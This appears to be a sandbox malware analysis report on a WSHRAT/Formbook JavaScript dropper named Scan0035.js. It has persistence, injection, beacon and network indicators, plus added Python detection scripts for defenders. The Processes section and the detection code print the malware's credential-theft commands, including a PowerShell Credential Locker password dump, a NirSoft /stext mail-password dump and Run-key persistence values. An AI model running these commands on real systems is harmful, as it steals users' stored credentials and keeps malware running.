Malware Analysis Report

2025-04-14 08:31

Sample ID 220216-2z4zqsebb7
Target Scan0035.js
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
Tags
formbook wshrat my7g collection persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9

Threat Level: Known bad

The file Scan0035.js was found to be: Known bad.

Malicious Activity Summary

formbook wshrat my7g collection persistence rat spyware stealer trojan

WSHRAT

Formbook

Nirsoft

Formbook Payload

NirSoft MailPassView

Executes dropped EXE

Blocklisted process makes network request

Reads user/profile data of web browsers

Drops startup file

Checks computer location settings

Adds Run key to start application

Accesses Microsoft Outlook accounts

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Gathers network information

Suspicious behavior: GetForegroundWindowSpam

Script User-Agent

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-16 23:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-16 23:02

Reported

2022-02-16 23:05

Platform

win7-en-20211208

Max time kernel

169s

Max time network

190s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

Formbook Payload

rat
Description | Indicator | Process | Target
3 matches, no description, indicator, process or target recorded

NirSoft MailPassView

Description | Indicator | Process | Target
3 matches, no description, indicator, process or target recorded

Nirsoft

Description | Indicator | Process | Target
3 matches, no description, indicator, process or target recorded

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js | C:\Windows\system32\wscript.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js | C:\Windows\System32\wscript.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\cmdc.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" | C:\Windows\system32\wscript.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" | C:\Windows\System32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" | C:\Windows\System32\wscript.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" | C:\Windows\system32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A

Both wscript.exe instances (the one running the Temp copy and the one relaunched from %APPDATA%, see Processes) write the same Run value under HKCU and under HKLM. The HKLM write succeeded, so the sample ran with administrative rights in this sandbox; on a standard-user account only the HKCU entry would land, which is still enough for the script to survive a reboot. The value relaunches the %APPDATA% copy of the script through wscript.exe //B (batch mode, no error dialogs), so a broken payload fails silently.
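
The two persistence mechanisms above (the Startup-folder copy and the Run values) share one shape: a script host launching a script from a user-writable directory. The following is an added example, not part of the sandbox report: it scores Sysmon-style registry value-set records (Event ID 13 fields TargetObject/Details/Image) and file-create records (Event ID 11 fields TargetFilename/Image) for that shape. The sample records are constructed; the first of each kind copies the report's indicator columns, the others are benign look-alikes for contrast.

```python
"""Flag autorun persistence set up through a Windows script host.

Added example, not part of the sandbox report. The registry paths accept both
the NT form used in the report (\\REGISTRY\\MACHINE\\...) and Sysmon's HKLM\\...
form. Sample records below are constructed.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1")
# Flags that hide the console window or suppress errors; an autorun entry for
# legitimate software rarely needs them.
QUIET_FLAGS = {"//b", "//nologo", "-w", "-windowstyle", "-nop", "-noprofile", "-enc", "-encodedcommand"}
# Locations a standard user can write to; a Run value pointing here is far
# more suspicious than one pointing into Program Files.
USER_WRITABLE = re.compile(r"\\(appdata|users\\public|programdata|temp)\\", re.I)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\[^\\]+$", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\[^\\]+$", re.I)


def _tokens(cmdline):
    """Split a command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_run_value(target_object, details, image):
    """Return the reasons a Run-key write looks like script-host persistence."""
    reasons = []
    if not RUN_KEY.search(target_object):
        return reasons
    toks = _tokens(details)
    if not toks:
        return reasons
    launcher = _basename(toks[0])
    if launcher in SCRIPT_HOSTS:
        reasons.append(f"run value launches script host {launcher}")
    if any(t.lower() in QUIET_FLAGS for t in toks[1:]):
        reasons.append("hidden/quiet execution flag present")
    for t in toks[1:]:
        if t.lower().endswith(SCRIPT_EXTS):
            reasons.append(f"script payload {t}")
            if USER_WRITABLE.search(t):
                reasons.append("payload lives in a user-writable directory")
    if _basename(image) in SCRIPT_HOSTS:
        reasons.append(f"value written by script host {_basename(image)}")
    # Qualifier, not a signal on its own: writing HKLM\...\Run needs admin rights.
    if reasons and target_object.upper().startswith(("\\REGISTRY\\MACHINE", "HKLM")):
        reasons.append("machine-wide (HKLM) Run key: the writer had admin rights")
    return reasons


def check_startup_drop(target_filename, image):
    """Return the reasons a file creation looks like a Startup-folder script drop."""
    reasons = []
    if not STARTUP_DIR.search(target_filename):
        return reasons
    if target_filename.lower().endswith(SCRIPT_EXTS):
        reasons.append("script file placed in Startup folder")
    if _basename(image) in SCRIPT_HOSTS:
        reasons.append(f"dropped by script host {_basename(image)}")
    return reasons


# Constructed records: the first of each kind is copied from the report's
# indicator columns, the others are benign entries for contrast.
REGISTRY_EVENTS = [
    {"TargetObject": r"\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan0035",
     "Details": r'wscript.exe //B "C:\Users\Admin\AppData\Roaming\Scan0035.js"',
     "Image": r"C:\Windows\System32\wscript.exe"},
    {"TargetObject": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035",
     "Details": r'wscript.exe //B "C:\Users\Admin\AppData\Roaming\Scan0035.js"',
     "Image": r"C:\Windows\System32\wscript.exe"},
    {"TargetObject": r"\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
     "Image": r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
]
FILE_EVENTS = [
    {"TargetFilename": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js",
     "Image": r"C:\Windows\system32\wscript.exe"},
    {"TargetFilename": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini",
     "Image": r"C:\Windows\explorer.exe"},
]


def triage(registry_events=REGISTRY_EVENTS, file_events=FILE_EVENTS):
    """Return (indicator, reasons) for every record that earns at least one reason."""
    hits = []
    for ev in registry_events:
        reasons = check_run_value(ev["TargetObject"], ev["Details"], ev["Image"])
        if reasons:
            hits.append((ev["TargetObject"], reasons))
    for ev in file_events:
        reasons = check_startup_drop(ev["TargetFilename"], ev["Image"])
        if reasons:
            hits.append((ev["TargetFilename"], reasons))
    return hits


if __name__ == "__main__":
    for indicator, reasons in triage():
        print(indicator)
        for reason in reasons:
            print("   -", reason)
```

The OneDrive record and the desktop.ini record produce no hit even though they live under the same Run key and Startup folder: the rules key on who launches what from where, not on the key or folder alone, which keeps the check usable on a fleet where those locations are busy with legitimate entries.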

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1040 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Roaming\bin.exe | C:\Windows\Explorer.EXE
PID 1140 set thread context of 1200 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Windows\Explorer.EXE

Enumerates physical storage devices

Kills process with taskkill

evasion
Description | Indicator | Process | Target | Hits
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A | 4

Script User-Agent

Description: HTTP User-Agent header (Process and Target: N/A for every row)

26 requests: WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands
2 requests: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

The first string is the WSHRAT beacon. The bot fingerprints the victim in its User-Agent, pipe-separated: an eight-hex-digit machine id, the computer name, the user name, the OS, a build tag, the detected antivirus ("nan-av", i.e. none), a boolean flag, a date (here the detonation day), the script version and the country. Any of these fields is a usable proxy-log indicator, and the machine id lets you count distinct infected hosts behind one egress address. The second string is the default User-Agent of the WinHttp.WinHttpRequest.5 COM object, the HTTP client WSH scripts normally use; on its own it is a weak indicator, because legitimate administrative scripts produce it too. The report does not tie individual User-Agent hits to destinations in the Network table.
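
The beacon format described above lends itself to a strict parser rather than a substring match, since the same fields also tell you which host is infected. The following is an added example, not part of the sandbox report and not the malware's code: it parses the WSHRAT User-Agent into named fields, classifies a request, and runs over a few constructed proxy log lines. The field names other than the literal WSHRAT and JavaScript-v markers are this editor's reading of the two strings the report recorded; the log format, client addresses and URLs are constructed for the demo.

```python
"""Parse WSHRAT beacon User-Agent strings and flag them in proxy logs.

Added example, not part of the sandbox report or the malware. Field names
are the editor's reading of the two UA strings in the report; the proxy log
lines are constructed.
"""
import re
from dataclasses import dataclass
from typing import Optional

# WSHRAT|<id>|<host>|<user>|<os>|<tag>|<av>|<flag> - <d/m/yyyy>|JavaScript-v<ver>|<CC>:<Country>
WSHRAT_UA = re.compile(
    r"^WSHRAT\|(?P<id>[0-9A-F]{8})\|(?P<host>[^|]+)\|(?P<user>[^|]+)\|(?P<os>[^|]+)\|"
    r"(?P<tag>[^|]+)\|(?P<av>[^|]+)\|(?P<flag>true|false) - (?P<date>\d{1,2}/\d{1,2}/\d{4})\|"
    r"JavaScript-v(?P<version>[0-9.]+)\|(?P<cc>[A-Z]{2}):(?P<country>.+)$"
)
# Default UA of the WinHttp.WinHttpRequest.5 COM object, the HTTP client WSH
# scripts normally use. Alone it is a weak signal: admin scripts emit it too.
WINHTTP_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"


@dataclass(frozen=True)
class WshratBeacon:
    id: str        # 8 hex digits; a per-machine id (field meaning assumed)
    host: str      # computer name
    user: str
    os: str
    tag: str       # "plus" in both report samples; build tag (assumed)
    av: str        # "nan-av" in both samples: no antivirus found (assumed)
    flag: str      # "true"/"false"; purpose not established by the report
    date: str      # d/m/yyyy; equals the detonation day in the report
    version: str
    cc: str
    country: str


def parse_wshrat_ua(ua: str) -> Optional[WshratBeacon]:
    m = WSHRAT_UA.match(ua.strip())
    if not m:
        return None
    return WshratBeacon(**{k: v.strip() for k, v in m.groupdict().items()})


def classify_ua(ua: str) -> str:
    """'high' for a WSHRAT beacon, 'low' for the bare WinHttp UA, else 'none'."""
    if parse_wshrat_ua(ua):
        return "high"
    if ua.strip() == WINHTTP_UA:
        return "low"
    return "none"


# Constructed log format: <epoch> <client_ip> <method> <url> "<user-agent>"
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def scan_proxy_log(lines):
    """Return one finding per line whose User-Agent classifies above 'none'."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        sev = classify_ua(m["ua"])
        if sev == "none":
            continue
        beacon = parse_wshrat_ua(m["ua"])
        findings.append({
            "severity": sev, "client": m["client"], "url": m["url"],
            "victim_id": beacon.id if beacon else None,
            "victim_host": beacon.host if beacon else None,
            "av": beacon.av if beacon else None,
        })
    return findings


def infected_hosts(findings):
    """Map each WSHRAT machine id to the internal client addresses it beaconed from."""
    out = {}
    for f in findings:
        if f["victim_id"]:
            out.setdefault(f["victim_id"], set()).add(f["client"])
    return out


# Constructed proxy lines: the three User-Agent strings are copied from the
# report; timestamps, client addresses and URLs are invented for the demo.
SAMPLE_LOG = [
    '1645052520 10.0.0.15 POST http://wshsoft.company/ "WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands"',
    '1645052521 10.0.0.15 GET http://ip-api.com/json/ "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"',
    '1645052530 10.0.0.22 POST http://wshsoft.company/ "WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands"',
    '1645052540 10.0.0.15 POST http://wshsoft.company/ "WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands"',
    '1645052550 10.0.0.31 GET http://www.example.com/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

if __name__ == "__main__":
    results = scan_proxy_log(SAMPLE_LOG)
    for r in results:
        print(r["severity"], r["client"], r["victim_host"], r["url"])
    print("infected machine ids:", infected_hosts(results))
```

The parser strips each field, because the Windows 7 sample carries a trailing space in the OS field ("Microsoft Windows 7 Ultimate |plus"); a naive exact-match rule on the OS string would miss it. The WinHttp UA is kept at low severity on purpose: it is worth correlating with the other signals in this report (ip-api.com lookups, a wscript.exe process with no console), not alerting on by itself.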

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target | Hits
N/A | N/A | C:\Users\Admin\AppData\Roaming\bin.exe | N/A | 3
N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A | 2

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Hits
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\bin.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A | 4

taskkill.exe (for /F) and powershell.exe enable SeDebugPrivilege as a matter of course, so those rows are expected. The rows that matter are bin.exe and mstsc.exe: they are the two processes that set Explorer.EXE's thread context above, and SeDebugPrivilege is what lets them open another user's process with full access.

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Hits
PID 1564 wrote to memory of 820 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe | 3
PID 820 wrote to memory of 1040 | N/A | C:\Windows\System32\wscript.exe | C:\Users\Admin\AppData\Roaming\bin.exe | 4
PID 1200 wrote to memory of 1140 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\mstsc.exe | 4
PID 1140 wrote to memory of 316 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Windows\SysWOW64\cmd.exe | 4
PID 820 wrote to memory of 1548 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 3
PID 820 wrote to memory of 816 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\system32\cmd.exe | 3
PID 816 wrote to memory of 1780 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe | 3
PID 820 wrote to memory of 1992 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\system32\cmd.exe | 3
PID 1992 wrote to memory of 1656 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe | 3
PID 820 wrote to memory of 736 | N/A | C:\Windows\System32\wscript.exe | C:\Users\Admin\AppData\Roaming\cmdc.exe | 4
PID 820 wrote to memory of 992 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\system32\cmd.exe | 3
PID 992 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe | 3
PID 820 wrote to memory of 1616 | N/A | C:\Windows\System32\wscript.exe | C:\Users\Admin\AppData\Roaming\cmdc.exe | 4
PID 820 wrote to memory of 1952 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\system32\cmd.exe | 3
PID 1952 wrote to memory of 880 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe | 3
PID 820 wrote to memory of 1548 | N/A | C:\Windows\System32\wscript.exe | C:\Users\Admin\AppData\Roaming\cmdc.exe | 4
PID 820 wrote to memory of 1524 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\system32\cmd.exe | 3

Every row is a parent writing into a child it has just created (CreateProcess copies the process parameters into the new process), so this table doubles as the process tree. The anomaly is PID 1200: Explorer.EXE spawns mstsc.exe with no arguments, which it only does because bin.exe has already taken it over (see SetThreadContext). PID 1548 is reused: first for powershell.exe, later for a cmdc.exe instance after PowerShell exited.

Processes

The report lists the processes flat; the tree below is rebuilt from the parent/child pairs in the WriteProcessMemory table, matched to command lines by order of appearance. Each entry gives the image and, indented beneath it, its command line. Who launched the first wscript.exe is not recorded.

C:\Windows\system32\wscript.exe  [PID 1564]
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0035.js
  C:\Windows\System32\wscript.exe  [PID 820]  (the script copied to %APPDATA% and relaunched in batch mode, //B, so no error dialogs appear)
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Scan0035.js"
    C:\Users\Admin\AppData\Roaming\bin.exe  [PID 1040]  (dropped EXE; takes over Explorer.EXE 1200 via SetThreadContext)
        "C:\Users\Admin\AppData\Roaming\bin.exe"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 1548]  (loads the WinRT PasswordVault class and dumps every entry of the Windows Credential Locker, passwords included, to tmp.txt; on Windows 7, this run's platform, the WinRT class does not exist and the command fails, on Windows 8 and later it works)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
    C:\Windows\system32\cmd.exe  [PID 816]
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      C:\Windows\system32\taskkill.exe  [PID 1780]
          taskkill /F /IM cmdc.exe
    C:\Windows\system32\cmd.exe  [PID 1992]
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      C:\Windows\system32\taskkill.exe  [PID 1656]
          taskkill /F /IM cmdc.exe
    C:\Users\Admin\AppData\Roaming\cmdc.exe  [PID 736]  (identified above as NirSoft MailPassView; /stext is the NirSoft switch that writes the recovered credentials to the named text file)
        "C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
    C:\Windows\system32\cmd.exe  [PID 992]
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      C:\Windows\system32\taskkill.exe  [PID 2028]
          taskkill /F /IM cmdc.exe
    C:\Users\Admin\AppData\Roaming\cmdc.exe  [PID 1616]
        "C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
    C:\Windows\system32\cmd.exe  [PID 1952]
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      C:\Windows\system32\taskkill.exe  [PID 880]
          taskkill /F /IM cmdc.exe
    C:\Users\Admin\AppData\Roaming\cmdc.exe  [PID 1548]  (PID reused after powershell.exe exited)
        "C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
    C:\Windows\system32\cmd.exe  [PID 1524]
        "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"

C:\Windows\Explorer.EXE  [PID 1200]  (the desktop shell, hijacked by bin.exe; the processes below run under its identity)
    C:\Windows\Explorer.EXE
  C:\Windows\SysWOW64\mstsc.exe  [PID 1140]  (launched with no arguments and in turn sets Explorer's thread context; loader -> Explorer -> a system binary such as mstsc.exe is Formbook's documented injection pattern)
      "C:\Windows\SysWOW64\mstsc.exe"
    C:\Windows\SysWOW64\cmd.exe  [PID 316]  (removes the dropped loader once the payload is resident in Explorer)
        /c del "C:\Users\Admin\AppData\Roaming\bin.exe"

The script kills any running cmdc.exe before each of the three cmdc.exe runs, and the Outlook account key opened by cmdc.exe (see "Accesses Microsoft Outlook accounts") is where MailPassView reads stored mail credentials from.
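
Read as process-creation telemetry, the tree above contains several command lines worth a rule of their own: the PasswordVault one-liner, the NirSoft-style /stext invocation, taskkill /F against a binary the same script dropped, and cmd /c del of the dropped loader. The following is an added example, not part of the sandbox report and not the malware's code: it rebuilds the tree from Sysmon Event ID 1 / Security 4688-style records (pid, parent pid, image, command line) and flags those patterns. The records are constructed from the report: PIDs and command lines are the report's, parent links follow the parent/child writes above, and Explorer.EXE as the parent of the first wscript.exe (as if the user opened the attachment) is an assumption, since the report does not record it.

```python
"""Rebuild a process tree from creation records and flag credential theft
and clean-up command lines.

Added example, not from the sandbox report or the malware. EVENTS is
constructed from the report's Processes and WriteProcessMemory sections;
the parent of PID 1564 is an assumption.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|users\\public|programdata|temp)\\", re.I)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _toks(cmdline):
    """Split on whitespace, keeping quoted paths whole and dropping the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


# (pid, ppid, image, command line); ppid 0 = unknown/root
EVENTS = [
    (1200, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    (1564, 1200, r"C:\Windows\system32\wscript.exe", r"wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0035.js"),
    (820, 1564, r"C:\Windows\System32\wscript.exe", r'"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Scan0035.js"'),
    (1040, 820, r"C:\Users\Admin\AppData\Roaming\bin.exe", r'"C:\Users\Admin\AppData\Roaming\bin.exe"'),
    (1140, 1200, r"C:\Windows\SysWOW64\mstsc.exe", r'"C:\Windows\SysWOW64\mstsc.exe"'),
    (316, 1140, r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Users\Admin\AppData\Roaming\bin.exe"'),
    (1548, 820, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"'),
    (816, 820, r"C:\Windows\system32\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe'),
    (1780, 816, r"C:\Windows\system32\taskkill.exe", r"taskkill /F /IM cmdc.exe"),
    (736, 820, r"C:\Users\Admin\AppData\Roaming\cmdc.exe", r'"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata'),
    (1524, 820, r"C:\Windows\system32\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"'),
]


def analyze(events=EVENTS):
    """Return (finding, ancestry chain) pairs for every rule that fires."""
    by_pid = {e[0]: e for e in events}
    images = {e[2].lower() for e in events}
    # Binaries that were executed out of a user-writable directory in this tree.
    dropped = {_base(e[2]) for e in events if USER_WRITABLE.search(e[2])}

    def chain(pid):
        names, seen = [], set()
        while pid in by_pid and pid not in seen:
            seen.add(pid)
            names.append(f"{_base(by_pid[pid][2])}({pid})")
            pid = by_pid[pid][1]
        return " <- ".join(names)

    findings = []
    for pid, ppid, image, cmd in events:
        img, low = _base(image), cmd.lower()
        toks = _toks(cmd)
        ltoks = [t.lower() for t in toks]
        parent_img = _base(by_pid[ppid][2]) if ppid in by_pid else ""
        # PowerShell reading the Windows Credential Locker with plaintext retrieval.
        if img == "powershell.exe" and "passwordvault" in low and "retrievepassword" in low:
            findings.append(("credential_vault_dump", chain(pid)))
        # NirSoft convention: /stext <file> writes recovered credentials to text.
        if "/stext" in ltoks and USER_WRITABLE.search(image):
            findings.append(("password_recovery_tool_stext", chain(pid)))
        # Forced kill of a binary this tree itself dropped.
        if img == "taskkill.exe" and "/f" in ltoks and "/im" in ltoks:
            i = ltoks.index("/im")
            if i + 1 < len(ltoks) and ltoks[i + 1] in dropped:
                findings.append(("kills_dropped_tool", chain(pid)))
        # cmd deleting an executable that ran in this tree (loader clean-up).
        if img == "cmd.exe" and "del" in ltoks:
            i = ltoks.index("del")
            if i + 1 < len(ltoks) and ltoks[i + 1] in images:
                findings.append(("deletes_dropped_exe", chain(pid)))
        # A script host re-running a script host on a script from a user directory.
        if img in SCRIPT_HOSTS and parent_img in SCRIPT_HOSTS and any(USER_WRITABLE.search(t) for t in toks[1:]):
            findings.append(("script_relaunch_from_user_dir", chain(pid)))
        # A script host spawning shells or binaries from user-writable locations.
        if parent_img in SCRIPT_HOSTS and (img in {"powershell.exe", "cmd.exe"} or USER_WRITABLE.search(image)):
            findings.append(("script_host_spawn", chain(pid)))
    return findings


if __name__ == "__main__":
    for kind, ancestry in analyze():
        print(f"{kind:32} {ancestry}")
```

Note what the deletes_dropped_exe chain looks like: cmd.exe(316) <- mstsc.exe(1140) <- explorer.exe(1200). bin.exe is nowhere in it, because bin.exe injected into Explorer rather than spawning anything. Process-creation telemetry alone cannot show that link; it takes the SetThreadContext and cross-process write records (Sysmon Event ID 8 and 10 on a real host) to connect the wscript.exe tree to the Explorer tree.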

Network

Country | Destination | Domain | Proto | Connections
US | 8.8.8.8:53 | astatech-cn.com | udp | 1
GB | 78.110.166.82:80 | astatech-cn.com | tcp | 2
US | 8.8.8.8:53 | ip-api.com | udp | 1
US | 208.95.112.1:80 | ip-api.com | tcp | 1
US | 154.127.53.102:7121 | 154.127.53.102 | tcp | 26
US | 8.8.8.8:53 | wshsoft.company | udp | 1
SG | 194.59.164.67:80 | wshsoft.company | tcp | 1
US | 8.8.8.8:53 | www.kk88126.com | udp | 1 (DNS only, no TCP connection in the capture)
US | 8.8.8.8:53 | www.a1-a2-ehliyet.xyz | udp | 1 (DNS only)
US | 8.8.8.8:53 | www.meredithandlance.com | udp | 1
US | 3.234.57.73:80 | www.meredithandlance.com | tcp | 1
US | 8.8.8.8:53 | www.alibabasite.com | udp | 1
AU | 172.105.162.84:80 | www.alibabasite.com | tcp | 1
US | 8.8.8.8:53 | www.alleinerziehend.love | udp | 1
DE | 217.160.243.50:80 | www.alleinerziehend.love | tcp | 1
US | 8.8.8.8:53 | www.dekolijubu.rest | udp | 1 (DNS only)

